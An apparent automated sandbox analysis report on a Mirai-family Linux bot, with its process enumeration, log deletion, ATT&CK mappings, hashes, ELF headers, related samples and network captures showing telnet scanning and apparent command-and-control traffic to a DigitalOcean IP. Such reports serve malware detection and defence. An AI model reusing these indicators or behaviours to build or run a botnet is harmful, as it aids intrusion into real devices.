      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3132/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3095/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3095/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1745/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1745/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1866/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1866/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1588/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1588/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/884/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/884/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1982/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1982/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/765/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/765/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3246/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3246/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/800/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/800/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/767/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/767/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1906/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1906/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/802/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/802/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/803/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/803/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1748/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1748/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3420/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3420/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1482/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1482/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/490/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/490/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1480/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1480/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1755/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1755/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1875/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1875/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/2964/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/2964/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3413/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3413/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1751/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1751/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1872/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1872/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/2961/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/2961/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1475/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1475/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/778/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/778/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/936/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/936/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/816/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/816/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1879/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1879/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1891/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1891/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3310/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3310/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3153/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/3153/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/780/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/780/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/660/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/660/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1921/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1921/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/783/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/783/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1765/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1765/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/2974/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/2974/cmdlineJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1400/statusJump to behavior
      Source: /tmp/la.bot.x86_64.elf (PID: 5435)File opened: /proc/1400/cmdlineJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: /tmp/la.bot.x86_64.elf (PID: 5436)Log files deleted: /var/log/kern.logJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: la.bot.x86_64.elf, type: SAMPLE
      Source: Yara matchFile source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: la.bot.x86_64.elf, type: SAMPLE
      Source: Yara matchFile source: 5458.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5434.1.0000000000400000.0000000000417000.r-x.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      Path Interception1
      Hidden Files and Directories
      1
      OS Credential Dumping
      1
      File and Directory Discovery
      Remote ServicesData from Local System1
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Indicator Removal
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      No configs have been found

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      la.bot.x86_64.elf34%ReversingLabsLinux.Trojan.Mirai
      la.bot.x86_64.elf34%VirustotalBrowse
      la.bot.x86_64.elf100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      daisy.ubuntu.com
      162.213.35.24
      truefalse
        high
        ai.stackoverflow.libre
        unknown
        unknowntrue
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http:///wget.shla.bot.x86_64.elffalse
            high
            http:///curl.shla.bot.x86_64.elffalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              120.113.24.42
              unknownTaiwan; Republic of China (ROC)
              17716NTU-TWNationalTaiwanUniversityTWfalse
              121.206.227.168
              unknownChina
              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              188.166.182.194
              unknownNetherlands
              14061DIGITALOCEAN-ASNUSfalse
              43.237.252.90
              unknownChina
              17506UCOMARTERIANetworksCorporationJPfalse
              89.144.218.28
              unknownAustria
              8447TELEKOM-ATA1TelekomAustriaAGATfalse
              74.125.250.129
              unknownUnited States
              15169GOOGLEUSfalse
              95.10.157.255
              unknownTurkey
              9121TTNETTRfalse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              188.166.182.194i686.elfGet hashmaliciousMiraiBrowse
                i686.elfGet hashmaliciousMiraiBrowse
                  i686.elfGet hashmaliciousMiraiBrowse
                    i686.elfGet hashmaliciousMiraiBrowse
                      i686.elfGet hashmaliciousMiraiBrowse
                        i686.elfGet hashmaliciousMiraiBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          daisy.ubuntu.commpsl.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.24
                          arm5.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.25
                          sh4.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.25
                          sh4.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.25
                          arm.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.24
                          arm7.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.25
                          arm6.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.25
                          jefne64.elfGet hashmaliciousUnknownBrowse
                          • 162.213.35.25
                          main_arm6.elfGet hashmaliciousMiraiBrowse
                          • 162.213.35.25
                          arm5.elfGet hashmaliciousUnknownBrowse
                          • 162.213.35.24
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          UCOMARTERIANetworksCorporationJPruXU7wj3X9.dllGet hashmaliciousWannacryBrowse
                          • 124.35.234.1
                          jpXNd6Kt8z.dllGet hashmaliciousWannacryBrowse
                          • 221.249.132.66
                          mpsl.elfGet hashmaliciousUnknownBrowse
                          • 221.244.184.6
                          arm7.elfGet hashmaliciousMiraiBrowse
                          • 221.240.51.10
                          meth15.elfGet hashmaliciousMiraiBrowse
                          • 58.156.8.128
                          elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                          • 221.115.71.164
                          elitebotnet.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                          • 122.218.88.225
                          6.elfGet hashmaliciousUnknownBrowse
                          • 58.15.147.49
                          res.mips.elfGet hashmaliciousUnknownBrowse
                          • 124.34.12.237
                          4.elfGet hashmaliciousUnknownBrowse
                          • 43.236.157.88
                          NTU-TWNationalTaiwanUniversityTWm68k.elfGet hashmaliciousUnknownBrowse
                          • 140.119.44.153
                          meth4.elfGet hashmaliciousMiraiBrowse
                          • 120.119.165.118
                          meth7.elfGet hashmaliciousMiraiBrowse
                          • 120.99.153.65
                          3.elfGet hashmaliciousUnknownBrowse
                          • 120.100.20.219
                          res.x86.elfGet hashmaliciousUnknownBrowse
                          • 140.112.12.62
                          frosty.sh4.elfGet hashmaliciousMiraiBrowse
                          • 120.97.103.14
                          armv5l.elfGet hashmaliciousUnknownBrowse
                          • 120.106.164.80
                          miori.m68k.elfGet hashmaliciousUnknownBrowse
                          • 120.105.93.228
                          miori.arm.elfGet hashmaliciousUnknownBrowse
                          • 120.121.110.147
                          sh4.elfGet hashmaliciousMiraiBrowse
                          • 120.115.83.156
                          DIGITALOCEAN-ASNUShttp://onlineausde.andhrauniversity.edu.in/studentLogin/Payments/Get hashmaliciousUnknownBrowse
                          • 64.227.138.132
                          https://hm.ru/XKEkPrGet hashmaliciousUnknownBrowse
                          • 138.68.75.10
                          https://caringforyousupport.com.au/Receipt536354.phpGet hashmaliciousWinSearchAbuseBrowse
                          • 68.183.112.81
                          http://jooracces.comGet hashmaliciousUnknownBrowse
                          • 206.189.225.178
                          http://www.affordablehousing.com/MaineCWLGet hashmaliciousUnknownBrowse
                          • 68.183.25.196
                          NoticeOfPayment.docxGet hashmaliciousUnknownBrowse
                          • 157.230.79.42
                          meth7.elfGet hashmaliciousMiraiBrowse
                          • 161.35.146.211
                          http://biomed.fiGet hashmaliciousUnknownBrowse
                          • 64.227.36.222
                          Absa Remittance Advice.docxGet hashmaliciousUnknownBrowse
                          • 157.230.79.42
                          Absa Remittance Advice.docxGet hashmaliciousUnknownBrowse
                          • 157.230.79.42
                          CHINANET-BACKBONENo31Jin-rongStreetCNV01vdyUACe.dllGet hashmaliciousWannacryBrowse
                          • 183.50.126.2
                          S8LDvVdtOk.dllGet hashmaliciousWannacryBrowse
                          • 220.187.236.1
                          xjljKPlxqO.dllGet hashmaliciousWannacryBrowse
                          • 119.140.230.219
                          wmnq39xe8J.dllGet hashmaliciousWannacryBrowse
                          • 218.91.200.1
                          GUtEaDsc9X.dllGet hashmaliciousWannacryBrowse
                          • 119.135.172.1
                          tTbeoLWNhb.dllGet hashmaliciousWannacryBrowse
                          • 219.130.9.1
                          330tqxXVzm.dllGet hashmaliciousWannacryBrowse
                          • 113.88.91.1
                          9kNjKSEUym.dllGet hashmaliciousWannacryBrowse
                          • 60.165.77.15
                          D3W41IdtQA.dllGet hashmaliciousWannacryBrowse
                          • 123.102.22.1
                          YZJG8NuHEP.dllGet hashmaliciousWannacryBrowse
                          • 116.248.34.1
                          No context
                          No context
                          Process:/tmp/la.bot.x86_64.elf
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):146
                          Entropy (8bit):4.024394204278479
                          Encrypted:false
                          SSDEEP:3:TBGTD+FN5CSNE4F58SASI7AWHF5x5mAR/VB6GEDwcL7uoL/:TBGD+5F+RLl0AR/VgGEDLHB/
                          MD5:E77B19565FA2C8C6B780A198F3889313
                          SHA1:4B18D7D88944804C96620323D60EE89E4B985BB4
                          SHA-256:F71785724FCE340C9FF9CD4341B920A602A47C0B496C57CCA177B94CB4BA297D
                          SHA-512:D22AAC8ADD55BCD9672465F3E67AF9DD4B69C0C85903C16A1C19ABDEA59EA0674DF69FF7D7F646FE642417103C7D4B6B5B3B1D5A8017C321417CBC5B3C243732
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:The gods watch from the heavens? Let them see what a mortal can become. let them witness a man who defies their will and carves his own destiny...
                          File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                          Entropy (8bit):6.2959748140744685
                          TrID:
                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                          File name:la.bot.x86_64.elf
                          File size:95'216 bytes
                          MD5:cfb666f58d6ad700f271fb3fd3df0692
                          SHA1:58d09f72c371b61677484f30b71048299b2f114d
                          SHA256:afb2e2df5a4b6cd2d4d00b4dbe1875e53d4f29352a525c820d54ab096b9007c6
                          SHA512:a73ac9a5375659bccbcfbfcf3335db1a3ab019440567146f8f3050631b92933d620ebbe6634f235d8e8757b2c933cedf28b2d04460697e03d16f8ceea25ffd72
                          SSDEEP:1536:j2E0HYmDrsvMpBJYuvdiiYQinmX7h9iZuzzdtgmTL33ihACNwY+yNh/l7d1:qE0HYmDrsS8wiiPXd9iIptgmD3ihpwYz
                          TLSH:B8933A0374C18DFDC8C6C5750EAFA136E632F15C2225726B2BD1BB356E9EE212F1A065
                          File Content Preview:.ELF..............>.......@.....@.......pq..........@.8...@.......................@.......@......k.......k.......................k.......kQ......kQ.....x.......pp..............Q.td....................................................H...._.....'..H........

                          ELF header

                          Class:ELF64
                          Data:2's complement, little endian
                          Version:1 (current)
                          Machine:Advanced Micro Devices X86-64
                          Version Number:0x1
                          Type:EXEC (Executable file)
                          OS/ABI:UNIX - System V
                          ABI Version:0
                          Entry Point Address:0x400194
                          Flags:0x0
                          ELF Header Size:64
                          Program Header Offset:64
                          Program Header Size:56
                          Number of Program Headers:3
                          Section Header Offset:94576
                          Section Header Size:64
                          Number of Section Headers:10
                          Header String Table Index:9
                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                          NULL0x00x00x00x00x0000
                          .initPROGBITS0x4000e80xe80x130x00x6AX001
                          .textPROGBITS0x4001000x1000x127f60x00x6AX0016
                          .finiPROGBITS0x4128f60x128f60xe0x00x6AX001
                          .rodataPROGBITS0x4129200x129200x42900x00x2A0032
                          .ctorsPROGBITS0x516bb80x16bb80x100x00x3WA008
                          .dtorsPROGBITS0x516bc80x16bc80x100x00x3WA008
                          .dataPROGBITS0x516be00x16be00x5500x00x3WA0032
                          .bssNOBITS0x5171400x171300x6ae80x00x3WA0032
                          .shstrtabSTRTAB0x00x171300x3e0x00x0001
                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                          LOAD0x00x4000000x4000000x16bb00x16bb06.35480x5R E0x100000.init .text .fini .rodata
                          LOAD0x16bb80x516bb80x516bb80x5780x70702.46170x6RW 0x100000.ctors .dtors .data .bss
                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 15, 2025 05:12:54.733428001 CET4002423192.168.2.1343.237.252.90
                          Jan 15, 2025 05:12:54.738360882 CET234002443.237.252.90192.168.2.13
                          Jan 15, 2025 05:12:54.738641024 CET4002423192.168.2.1343.237.252.90
                          Jan 15, 2025 05:12:54.752363920 CET4285423192.168.2.1395.10.157.255
                          Jan 15, 2025 05:12:54.757611990 CET234285495.10.157.255192.168.2.13
                          Jan 15, 2025 05:12:54.757671118 CET4285423192.168.2.1395.10.157.255
                          Jan 15, 2025 05:12:54.762281895 CET3721223192.168.2.13120.113.24.42
                          Jan 15, 2025 05:12:54.767116070 CET2337212120.113.24.42192.168.2.13
                          Jan 15, 2025 05:12:54.767275095 CET3721223192.168.2.13120.113.24.42
                          Jan 15, 2025 05:12:54.769454956 CET5991223192.168.2.1389.144.218.28
                          Jan 15, 2025 05:12:54.774252892 CET235991289.144.218.28192.168.2.13
                          Jan 15, 2025 05:12:54.774342060 CET5991223192.168.2.1389.144.218.28
                          Jan 15, 2025 05:12:54.809427977 CET4281223192.168.2.13121.206.227.168
                          Jan 15, 2025 05:12:54.814249992 CET2342812121.206.227.168192.168.2.13
                          Jan 15, 2025 05:12:54.814497948 CET4281223192.168.2.13121.206.227.168
                          Jan 15, 2025 05:12:54.837517023 CET4281223192.168.2.13121.206.227.168
                          Jan 15, 2025 05:12:54.837565899 CET3721223192.168.2.13120.113.24.42
                          Jan 15, 2025 05:12:54.837565899 CET4002423192.168.2.1343.237.252.90
                          Jan 15, 2025 05:12:54.837565899 CET5991223192.168.2.1389.144.218.28
                          Jan 15, 2025 05:12:54.837637901 CET4285423192.168.2.1395.10.157.255
                          Jan 15, 2025 05:12:54.842571974 CET2342812121.206.227.168192.168.2.13
                          Jan 15, 2025 05:12:54.842808008 CET2337212120.113.24.42192.168.2.13
                          Jan 15, 2025 05:12:54.842816114 CET234002443.237.252.90192.168.2.13
                          Jan 15, 2025 05:12:54.842823029 CET235991289.144.218.28192.168.2.13
                          Jan 15, 2025 05:12:54.842832088 CET234285495.10.157.255192.168.2.13
                          Jan 15, 2025 05:12:54.842861891 CET5991223192.168.2.1389.144.218.28
                          Jan 15, 2025 05:12:54.842864990 CET3721223192.168.2.13120.113.24.42
                          Jan 15, 2025 05:12:54.842885017 CET4281223192.168.2.13121.206.227.168
                          Jan 15, 2025 05:12:54.842900991 CET4285423192.168.2.1395.10.157.255
                          Jan 15, 2025 05:12:54.842920065 CET4002423192.168.2.1343.237.252.90
                          Jan 15, 2025 05:12:54.891916037 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:12:54.899380922 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:12:54.899481058 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:12:55.724112988 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:12:55.724493027 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:12:55.995166063 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:12:55.995337009 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:12:58.982800007 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:12:59.192210913 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:12:59.404180050 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:12:59.521130085 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:12:59.521150112 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:12:59.521467924 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:13:08.992292881 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:13:08.997200966 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:13:08.997260094 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:13:09.002288103 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:13:23.520179987 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:13:23.525707960 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:13:23.525777102 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:13:23.530662060 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:13:37.576178074 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:13:37.892190933 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:13:38.349584103 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:13:38.349595070 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:13:38.705811977 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:13:38.705879927 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:13:52.092609882 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:13:52.097734928 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:13:52.103729963 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:13:52.109122992 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:14:05.104376078 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:14:05.109178066 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:14:05.109234095 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:14:05.114017010 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:14:18.766077995 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:14:18.771471024 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:14:18.771569967 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:14:18.776712894 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:14:31.996215105 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:14:32.003942966 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:14:32.004060030 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:14:32.010894060 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:14:47.008361101 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:14:47.014446020 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:14:47.014707088 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:14:47.020319939 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:15:00.264379025 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:15:00.270277977 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:15:00.270550013 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:15:00.275964975 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:15:13.224488974 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:15:13.229978085 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:15:13.230221033 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:15:13.235975027 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:15:24.747010946 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:15:24.747251034 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:15:34.756202936 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:15:34.761684895 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:15:34.761933088 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:15:34.766990900 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:15:49.768282890 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:15:49.773592949 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:15:49.773731947 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:15:49.778650045 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:16:03.924222946 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:16:03.930617094 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:16:03.931067944 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:16:03.937096119 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:16:16.480137110 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:16:16.485409021 CET1032156800188.166.182.194192.168.2.13
                          Jan 15, 2025 05:16:16.485505104 CET5680010321192.168.2.13188.166.182.194
                          Jan 15, 2025 05:16:16.490304947 CET1032156800188.166.182.194192.168.2.13
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 15, 2025 05:12:54.875724077 CET4496753192.168.2.13130.61.69.123
                          Jan 15, 2025 05:12:54.882417917 CET5344967130.61.69.123192.168.2.13
                          Jan 15, 2025 05:12:55.919722080 CET5421919302192.168.2.1374.125.250.129
                          Jan 15, 2025 05:12:56.370510101 CET193025421974.125.250.129192.168.2.13
                          Jan 15, 2025 05:15:36.778017998 CET3730653192.168.2.131.1.1.1
                          Jan 15, 2025 05:15:36.778076887 CET4639953192.168.2.131.1.1.1
                          Jan 15, 2025 05:15:36.785131931 CET53463991.1.1.1192.168.2.13
                          Jan 15, 2025 05:15:36.785232067 CET53373061.1.1.1192.168.2.13
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
